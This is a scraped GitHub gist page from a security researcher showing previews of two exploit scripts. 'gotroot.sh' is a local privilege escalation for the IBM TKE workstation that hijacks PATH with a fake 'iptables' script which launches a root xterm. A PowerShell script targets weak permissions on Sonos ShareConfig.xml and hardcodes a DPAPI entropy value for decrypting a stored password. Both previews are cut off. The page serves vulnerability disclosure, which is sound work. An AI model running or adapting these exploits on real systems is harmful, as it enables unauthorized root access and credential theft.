Skip to content

Instantly share code, notes, and snippets.

Yorick Koster ykoster

Block or report user

Report or block ykoster

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ykoster
ykoster / gotroot.sh
Created Mar 31, 2019
IBM Trusted Key Entry (TKE) workstation local privilege escalation
View gotroot.sh
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
@ykoster
ykoster / SonosController.ps1
Last active Apr 3, 2019
Sonos Controller for Windows ShareConfig.xml weak file permissions
View SonosController.ps1
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
You can’t perform that action at this time.